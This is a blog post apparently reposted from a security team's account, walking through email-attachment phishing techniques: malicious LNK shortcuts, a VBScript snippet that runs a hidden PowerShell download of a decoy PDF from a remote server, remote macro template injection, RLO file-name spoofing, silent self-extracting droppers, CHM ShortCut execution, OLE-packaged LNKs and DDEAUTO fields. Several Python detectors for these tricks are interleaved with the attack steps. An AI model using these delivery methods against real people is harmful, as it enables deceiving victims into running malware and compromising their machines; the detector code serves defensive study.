Common techniques of email attachment phishing
2022-06-26 23:26:00 【st3pby】
Technical communication
Follow the WeChat official account Z20 Security Team and reply "Add group" to be pulled into the group and discuss technology together.

This post was copied from the official account, so the layout may be a bit messy; you can also read it on the official account.

LNK
An LNK file is, simply put, a shortcut. It is created as follows:

The following figure shows the property information of a shortcut to calc.exe. We can write our own malicious command into the "Target" field, for example a PowerShell command that brings the host online:


Running it then brings the host online in CS.
In an actual phishing campaign, however, a shortcut to calc.exe with a big computer icon obviously does not look like a good idea, so you can try changing the file's icon under "Properties":

However, replacing the icon with one of the system's built-in ICO resources has a drawback: when that icon does not exist on the target machine, a blank white icon appears instead:

A better way is to modify the icon_location value of the LNK and set it to a file with the relevant suffix, so that the system automatically picks the icon of the corresponding default handler:
Open the LNK file with WinHex or 010 Editor and find the ICON_LOCATION string in the String Data section:

We change it to .\1.pdf (Unicode), with a character count of 0x07:

07002E005C0031002E00700064006600
My default PDF handler is the Edge browser, so when icon_location is set to a .pdf suffix, the file's icon automatically shows as Edge's PDF icon. This way we get an icon that adapts to the victim's own PDF handler:

When the victim opens our so-called PDF, which is in fact a malicious shortcut, double-clicking it produces no visible reaction, and that may raise a little doubt. So when going online via PowerShell, mshta or similar methods, we can modify the code generated by Cobalt Strike and add a section that automatically downloads and opens a real PDF, to make the result look convincing. The specific process is as follows:
First, create a new shortcut pointing at %windir%\System32\mshta.exe (the file name should be as confusing as possible), and change its icon to any one from %SystemRoot%\System32\SHELL32.dll:

Use CS to generate an HTA trojan that uses the PowerShell method

Open the HTA file and add the following statements before the line that executes the payload:

```vbscript
Dim open_pdf
Set open_pdf = CreateObject("Wscript.Shell")
open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.50.15:8000/1.pdf',$env:temp+'\1.pdf');Start-Process ($env:temp+'\1.pdf')", 0, true
```

Then start an HTTP service with Python

Thus, when the victim opens the LNK file, a normal PDF document is first downloaded from the remote server and opened.
Next, use the method described above to change the shortcut's icon to the PDF icon.
Use CS to host the HTA file for download:

Then change the shortcut's arguments to the HTA download address:

Then double-click the LNK file: the host comes online, and the victim sees a normal PDF file:
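For the defender's side of the two shortcut tricks above (borrowing a document icon through ICON_LOCATION, and pointing the target at mshta.exe), here is an added Python example that is not part of the original post: a minimal parser for the Shell Link header and StringData section that flags a .lnk whose icon is borrowed from a document suffix while its target or arguments invoke a script host. The sample file is constructed inside the code; it reuses the post's ICON_LOCATION bytes for .\1.pdf, while the mshta relative path and the HTA URL are placeholders.

```python
import struct

# Shell Link header CLSID and the LinkFlags bits that govern which StringData
# entries are present (MS-SHLLINK, section 2.1.1).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries follow the header (and IDList/LinkInfo) in this fixed order.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

DOCUMENT_SUFFIXES = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")
SCRIPT_HOSTS = ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData section of a .lnk file into a dict."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize + ItemIDs
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]  # LinkInfoSize includes itself
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def suspicious_lnk(fields: dict) -> list:
    """Flag the combination the post relies on: a document-type icon together
    with a target or argument list that runs a script host."""
    icon = fields.get("icon_location", "").lower()
    target = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    if icon.endswith(DOCUMENT_SUFFIXES) and any(h in target for h in SCRIPT_HOSTS):
        return [f"icon borrowed from {icon!r} but target runs a script host: {target!r}"]
    return []


def build_sample_lnk() -> bytes:
    """Constructed sample: a relative path to mshta.exe (placeholder), an HTA URL
    as argument (placeholder host), and the post's ICON_LOCATION bytes for .\\1.pdf."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20)  # FileAttributes=ARCHIVE
    header += b"\x00" * 24  # creation/access/write FILETIMEs (zero = unset)
    header += struct.pack("<IiIHHII", 0, 0, 1, 0, 0, 0, 0)  # FileSize..Reserved3, ShowCommand=1
    assert len(header) == 0x4C

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(r"..\..\..\Windows\System32\mshta.exe")
    body += string_data("http://example.invalid/1.hta")
    body += bytes.fromhex("07002E005C0031002E00700064006600")  # count 0x07, ".\1.pdf"
    return header + body


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    print(parsed)
    print(suspicious_lnk(parsed))
```

The parser stops after StringData, which is all this check needs; a real triage tool would also walk the LinkTargetIDList to recover the absolute target when no relative path is stored.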


Macro
CS

Generate an Office macro virus file. This package generates a VBA macro that you can embed into a Microsoft Word or Excel document. This attack applies to x86 and x64 Office on Windows.

In Word, go to the View tab and insert the relevant macro:


Just create a macro, paste in the macro code from CS and save. Run it and Word goes online (Excel is similar).

But this approach has a drawback: the macro code sits locally in the document, so it is very easily caught by antivirus.
Remote template injection of macro code
So we can instead try loading the macro through a remotely loaded template.
Principle:
When a Word document loads an attached template, Word issues the request to fetch it, and this behaviour can be exploited. When the target user opens the malicious Word document sent by the attacker, the document sends a request to the remote server, loads the template from there and executes the malicious template's macro.
The document that is sent does not itself carry malicious code, so it passes many static checks. The macro virus or trojan only needs to be written into the remote DOTM document.
Idea:
1. Write a DOTM file containing the macro code and upload it to the server
2. Write a DOCX file that uses a template
3. Decompress the document, find settings.xml.rels, and change its target to the URL of the DOTM on the server
4. Compress the decompressed DOCX contents back into a ZIP in "store" mode
5. Change the suffix back to DOCX; when opened, the document remotely injects the macro
Create a new Word document, open the macro code editor, and under ThisDocument write the following macro code

When saving, choose dotm as the file type:

Start a web service and place the file in its directory: http://192.168.111.234/cs_macro.dotm
Make the docx
Create a Word file that looks like a resume template:

Change the Word file's extension from docx to zip, decompress it, and find settings.xml.rels

Open it with a text editor and modify the target item. The available protocols are ftp, smb and http; http is used here:
Change the target content to http://192.168.111.234/cs_macro.dotm

Then select all files in the directory, compress them into macro_test.zip, and change the suffix to docx

Production complete.
Double-click to open it, enable macros, and the host comes online:
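As an added example from the detection side (not the post's own code), the following Python checks a .docx for exactly the settings.xml.rels change described above: an attachedTemplate relationship whose external Target is an http, ftp or UNC/SMB location rather than a local template. The relationships part sits at word/_rels/settings.xml.rels inside the zip. The sample .docx is constructed in the code and carries only the parts the check reads; the post's template URL is used as the malicious target, while the file server name and the Normal.dotm path are made-up.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# The relationships part that the post edits, at its fixed path inside the .docx zip.
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def is_remote_target(target: str) -> bool:
    """True for the transports the post lists (http, ftp, smb/UNC). A file:///C:/...
    reference to Normal.dotm, which legitimate documents often carry, is local."""
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return True
    if scheme == "file" and parts.netloc:      # file://server/share/x.dotm is a UNC path
        return True
    return target.startswith("\\\\")           # \\server\share\x.dotm


def remote_templates(docx_bytes: bytes) -> list:
    """Return the external attachedTemplate targets declared in a .docx."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(SETTINGS_RELS))
    hits = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE or rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        if is_remote_target(target):
            hits.append(target)
    return hits


def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal .docx: only the parts this check reads, stored
    uncompressed (the 'store' mode the post uses when re-zipping)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(remote_templates(build_sample_docx("http://192.168.111.234/cs_macro.dotm")))
```

Because the check only reads the relationships part, it works on the unopened attachment at the mail gateway, which is where this technique is meant to be caught: the document body is clean, and the macro only arrives when Word follows the template link.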


File name inversion (RLO)
RLO, i.e. Right-to-Left Override: we can insert this kind of Unicode character into a file name so that the displayed name is reversed.
Take calc.exe as an example.
Rename it to calcgpj.exe, then right-click between calc and g to insert the RLO character, as shown in the picture

OK, it now ends in jpg, but double-clicking still runs it as an exe.

Then use ResourceHacker to modify the icon.
Find a picture and convert it to ICO format:
http://www.bitbug.net/

As pictured, double-clicking actually runs calc.
Self-extracting archive
First we need to prepare the trojan (cmd.exe) and the normal program (calc.exe)

1. Select the two programs, add them to an archive, and choose "Create SFX archive"

2. Advanced SFX options -> General: extraction path -> absolute path:
Write C:\windows\temp as the path
3. Advanced SFX options -> Setup, run after extraction:

C:\windows\temp\<the selected trojan name>
C:\windows\temp\<the selected program name>
4. Advanced SFX options -> Modes
Silent mode -> Hide all
5. Advanced SFX options -> Update
Update mode -> Extract and update files
Overwrite mode -> Overwrite all files
6. OK

Run it, and the effect is achieved. Here we also need to work on some details of the disguise.
Use Resource Hacker to change the icon:

Run it.
Self-extracting archive + RLO
Pack the PNG picture and muma.exe into a self-extracting gnp.exe
Use RLO to reverse the file name so that it displays as exe.png
Modify the icon of exe.png so that it looks like a picture
Run it: it looks like a picture, the suffix is a picture's, opening it shows a picture, yet the trojan has executed



Double-click pikaexe.jpg
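The RLO section and the self-extracting archive + RLO combination above share one detection story, so here is one added Python example (not the post's code) covering both: it renders how a file name containing U+202E is displayed, compares the displayed extension with the one Windows will actually use, and checks whether an attachment that claims to be an image is really a PE stub with an appended RAR or ZIP archive, which is what a WinRAR SFX is. The sample SFX bytes are constructed (MZ header, padding, RAR signature), and the sample name reuses the post's gnp.exe trick with a made-up prefix.

```python
import unicodedata

# Unicode bidirectional controls that change how a name is drawn without being visible.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE, the character the post inserts

# Signatures of the archive formats self-extracting stubs append after their PE code.
RAR_SIGNATURE = b"Rar!\x1a\x07"   # RAR 4.x continues with \x00, RAR 5.x with \x01\x00
ZIP_SIGNATURE = b"PK\x03\x04"


def rendered_name(name: str) -> str:
    """Approximate how Explorer draws a name containing one U+202E: the control is
    invisible and everything after it is shown reversed."""
    head, sep, tail = name.partition(RLO)
    if not sep:
        return name
    return head + tail[::-1]


def filename_findings(name: str) -> list:
    """Report bidi controls in a file name and any mismatch between the extension
    the user sees and the one Windows will actually use."""
    controls = sorted({c for c in name if c in BIDI_CONTROLS})
    if not controls:
        return []
    findings = ["bidi control in file name: " + ", ".join(
        f"U+{ord(c):04X} {unicodedata.name(c)}" for c in controls)]
    shown = rendered_name(name)
    real_ext = name.rsplit(".", 1)[-1].lower()
    shown_ext = shown.rsplit(".", 1)[-1].lower()
    if real_ext != shown_ext:
        findings.append(f"displays as {shown!r} (.{shown_ext}) but will execute as .{real_ext}")
    return findings


def embedded_archive_offset(data: bytes) -> int:
    """For a PE image, return the offset of an appended RAR or ZIP archive, or -1.
    A WinRAR SFX is a stub executable followed by the archive, so a file that is
    supposedly an image but starts with MZ and carries an archive signature is one."""
    if not data.startswith(b"MZ"):
        return -1
    for sig in (RAR_SIGNATURE, ZIP_SIGNATURE):
        off = data.find(sig, 0x40)   # skip the DOS header itself
        if off != -1:
            return off
    return -1


def inspect_attachment(name: str, data: bytes) -> list:
    """Combine the name check and the content check for one attachment."""
    findings = filename_findings(name)
    off = embedded_archive_offset(data)
    if off != -1:
        findings.append(f"PE file with an embedded archive at offset {off:#x} (self-extracting stub)")
    return findings


# Constructed sample: a stand-in SFX stub (MZ header, padding, RAR 4 signature),
# named with the post's RLO trick so that Explorer shows it as mumaexe.png.
SAMPLE_SFX = b"MZ" + b"\x00" * 0x80 + RAR_SIGNATURE + b"\x00" + b"\x00" * 16
SAMPLE_NAME = "muma\u202egnp.exe"

if __name__ == "__main__":
    for line in inspect_attachment(SAMPLE_NAME, SAMPLE_SFX):
        print(line)
```

Mail gateways and EDR typically apply the first check to every attachment name (any bidi control in a file name is unusual enough to quarantine) and the second to anything whose declared type does not match its magic bytes.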

CHM e-book
CHM (Compiled Help Manual), i.e. "compiled help file", is Microsoft's new-generation help file format: the source is written in HTML, and the help content is compiled and stored in database form.
Making a CHM requires the tool EasyCHM (http://www.etextwizard.com/).
Create a new HTML file with ANSI encoding and write the following into it:
```html
<!DOCTYPE html>
<html>
<head><title>Mousejack replay</title></head>
<body>command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
</body>
</html>
```
The Item1 line is the one that executes the command; note the commas before and after cmd.exe. `<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>` also works.
In EasyCHM: New - Browse - select the directory containing the HTML file - Compile

This generates a chm; double-clicking it opens the calculator

Office OLE+LNK
The core goal is to create an embedded LNK file that induces the user to click it, so as to execute the command. Both Word and Excel can be used.
We create a shortcut as follows

The target is

```
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc
```

Then open the Word file, choose Insert Object, select Package, and to make it more realistic tick "show as icon". You can then change the icon; at Change Icon we pick a more confusing one

Then enter the Create Package interface, choose the LNK file we just created, write the volume label, and insert the package into the Word document. As long as the user clicks the package and selects Execute, the code defined in our LNK will run



File bundling
The K8 toolkit comes with a bundler, "Bundled Enhanced Version V2.0.EXE"
Super file bundler

Generate the file; running it has the same effect as running cmd.exe, but the backdoor program is executed as well.
Word DDE
In a Word document, press Ctrl+F9 to enter field code editing. We can type the following code to execute a system command when the file is opened (reproduction failed on Word 2019 and succeeded on Word 2016; it seems to be a Word version issue).
This is quite practical: at present many Word installations have macros disabled by default, while DDE only needs the user to click two buttons to execute, so in practice it is better than macros.

```
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
```

Then when you open the file, two dialog boxes appear; after confirming both, the command above executes
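The CHM, OLE package and DDE techniques in the sections above all leave their command or container in plain markup that a scanner can read before anything is opened, so here is one added Python example (not the post's own code) covering all three: it extracts the command line from an HTML Help "ShortCut" object (the hhctrl.ocx CLSID used in the CHM sample), lists DDE/DDEAUTO field instructions in word/document.xml, and counts OLE objects inserted as "Package" (the Insert Object path used to embed the LNK). The CHM sample is the post's page source; the document.xml fragment is constructed, with the post's DDEAUTO field deliberately split across two runs and made-up attribute values on the Package object.

```python
import re
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
O_NS = "urn:schemas-microsoft-com:office:office"
# CLSID of the HTML Help ActiveX control (hhctrl.ocx) whose ShortCut command the CHM sample uses.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
OBJECT_RE = re.compile(r"<object\b([^>]*)>(.*?)</object>", re.IGNORECASE | re.DOTALL)
PARAM_RE = re.compile(r"""<param\s+name=["']([^"']+)["']\s+value=["']([^"']*)["']""", re.IGNORECASE)
DDE_RE = re.compile(r"\b(DDEAUTO|DDE)\b\s+(\S+)", re.IGNORECASE)


def chm_shortcut_commands(html: str) -> list:
    """Return the Item1 values (window title, program, arguments) of HTML Help
    ShortCut objects in a help page source; each one is a command the CHM will run."""
    commands = []
    for attrs, body in OBJECT_RE.findall(html):
        if HHCTRL_CLSID not in attrs.lower():
            continue
        params = {k.lower(): v for k, v in PARAM_RE.findall(body)}
        if params.get("command", "").lower() == "shortcut" and "item1" in params:
            commands.append(params["item1"])
    return commands


def dde_fields(document_xml: str) -> list:
    """Return (field type, program) pairs for DDE/DDEAUTO fields in word/document.xml.
    Word often splits one field instruction across several w:instrText runs, so the
    instruction text is concatenated before matching; w:fldSimple instr attributes
    are checked as well."""
    root = ET.fromstring(document_xml)
    instr = "".join(el.text or "" for el in root.iter(f"{{{W_NS}}}instrText"))
    simple = " ".join(el.get(f"{{{W_NS}}}instr", "") for el in root.iter(f"{{{W_NS}}}fldSimple"))
    return [(m.group(1).upper(), m.group(2)) for m in DDE_RE.finditer(instr + " " + simple)]


def embedded_packages(document_xml: str) -> int:
    """Count OLE objects whose ProgID is Package, the container Insert Object -> Package
    produces and the one the post uses to embed a .lnk in a document."""
    root = ET.fromstring(document_xml)
    return sum(1 for el in root.iter(f"{{{O_NS}}}OLEObject") if el.get("ProgID") == "Package")


# The post's CHM page source, with its HTML corrected.
SAMPLE_CHM_HTML = """<!DOCTYPE html><html><head><title>Mousejack replay</title></head>
<body>command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>"""

# Constructed word/document.xml fragment: the post's DDEAUTO field split over two
# runs, plus one embedded Package object (attribute values are made up).
SAMPLE_DOCUMENT_XML = rf"""<w:document xmlns:w="{W_NS}" xmlns:o="{O_NS}"><w:body>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\windows\\system32\\cmd.exe </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"/k calc.exe" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
<w:p><w:r><w:object><o:OLEObject Type="Embed" ProgID="Package" DrawAspect="Icon"
 ObjectID="_0001"/></w:object></w:r></w:p>
</w:body></w:document>"""

if __name__ == "__main__":
    print(chm_shortcut_commands(SAMPLE_CHM_HTML))
    print(dde_fields(SAMPLE_DOCUMENT_XML))
    print(embedded_packages(SAMPLE_DOCUMENT_XML))
```

For a real CHM the HTML first has to be pulled out of the ITSF container (for example with a CHM extraction tool), and for a .docx the document.xml comes out of the zip as in the template check earlier; the scanning logic itself is what this block shows.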



